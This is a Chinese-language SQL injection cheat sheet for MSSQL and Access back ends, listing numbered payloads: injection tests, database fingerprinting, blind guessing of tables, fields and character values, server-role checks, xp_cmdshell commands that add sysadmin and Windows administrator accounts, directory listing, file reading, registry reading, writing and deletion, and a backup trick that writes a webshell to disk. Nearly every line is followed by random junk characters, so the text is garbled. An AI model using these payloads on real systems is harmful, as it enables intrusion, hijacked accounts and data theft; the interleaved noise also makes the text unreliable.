1.判断是否有注入;and 1=1 ;and 1=2 V'tqsKQ!
2.初步判断是否是mssql ;and user>0 ? 'qyI^m@
m*L5xxc!
3.注入参数是字符'and [查询条件] and ''=' d
A'0'M
Bq;GO
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 27+~!R~Yw
F( 4Ue6R
5.判断数据库系统 `g_r<EY8/
m^\&v0
;and (select count(*) from sysobjects)>0 mssql <-mhz`^
v}J0j
;and (select count(*) from msysobjects)>0 access fP[S.7F+No
2FW"uYA;6
2z.~K&+x
)QWhzY
6.猜数据库 ;and (select Count(*) from [数据库名])>0 a)4%sX*I
.EPv4[2%F8
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Qqi?DW1)-
Z4X, D`s
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 l1#.rg
L|Xg4Z
9.(1)猜字段的ascii值(access) hH9~.4+*`g
eZ$M#I=o
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 8f<y~L_(`
1 +s;a]-C
(2)猜字段的ascii值(mssql) !MrQ-B (
:.tL~%
q
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ie11syhV"
Y]_$+Si:NK
10.测试权限结构(mssql) 1{5t.
)+"5($~
aM
xd"cTzx
?K;l 5$?%
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- jU kxA7 }}
Yg?BcY\
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- tUuARo7#
${E^OE
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- j/_&]6!
C0K:
ffv;<
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- fdWqc_
0l4f%'f
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- >gs_Bzy]
&S`g&
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 3A{)C_1a
Zwz co
;and 1=(select IS_MEMBER('db_owner'));-- |d z2Drc
0WfnX>(C7R
eM
5#L,Y{
z@J>A![m
11.添加mssql和系统的帐户 kt0xR)gU
eX>*}pI
;exec master.dbo.sp_addlogin username;-- Gov.;hy
;exec master.dbo.sp_password null,username,password;-- ar\K8mj
*7-rm
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- jV9oTH-
qp)Wt6 k?
;exec master.dbo.xp_cmdshell 'net user username password 7R7+jL,
Be6+YM5Cl
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- !yVY[
6-uLK'E
;exec master.dbo.xp_cmdshell 'net user username password /add';-- -%]1q#C>@
rQ_]%ies8
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- jVLJqWP'!
Y8^WuN$
j#2EQ
u]7wd3(
12.(1)遍历目录 a??8)=0|}
!V(r
p80
;create table dirs(paths varchar(100), id int) s*_fRf:
1og+(m`BL
;insert dirs exec master.dbo.xp_dirtree 'c:\' G&Dl($
|`Noj+T47I
;and (select top 1 paths from dirs)>0 (hdu+^Qj=
SASLeGaV
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) jI0gf&v8
'e' p`*
7i{(,:
*Ow2,{Nn
(2)遍历目录 W;cYg.W2
79cM_O
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Ncsh{.
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ;9WUt,R
<xF]ca
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 },#7
p}h.2)PO
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 :\qapFV
\o/eF&
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 x~R,rb
I#M>b:"te
Dw7Xy}I/
4bp})>}jB
13.mssql中的存储过程 '2i !RT-
^9Cu?!xu0
xp_regenumvalues 注册表根键, 子键 A7%/sMv
4oH ,_sr
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 :{ZwzJ
Q!qD3<?5
xp_regread 根键,子键,键值名 *Cf!p\7!
T@i*
F M
;exec xp_regread d23=WNn
23i2yT
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 G`kz 0Vk
U|Gy 9"
xp_regwrite 根键,子键, 值名, 值类型, 值 Uavl%Q
"O0xh_Nr
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 8{/.1:
D>7J[ Yxg-
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 J{prI;]K
OqDP{X:
xp_regdeletevalue 根键,子键,值名 Jy%?"wn
OR!W3
@
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ![_0GFbT
xQDQgvwa
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 HnKgD:
_fu <`|kc
bKGX>
%-
;s{'cN[.
14.mssql的backup创建webshell ZK'46lh
CX{6
use model b^C27s
:o{,F7(P
create table cmd(str image); N'9T*&o+
z8awND
insert into cmd(str) values (''); <\ <o#Vq
M @-:iP
backup database model to disk='c:\l.asp'; tkcs6uy
oC49c~`8
jF0"AA
RPgz"-
15.mssql内置函数 >8kXa.)84
@WS77d~S
;and (select @@version)>0 获得Windows的版本号 86 e13MF
;J TY#)Bh
;and user_name()='dbo' 判断当前系统的连接用户是不是sa >~rlnRX
[V:~j1{3
;and (select user_name())>0 爆当前系统的连接用户 QwWd"Of
p? o[+L<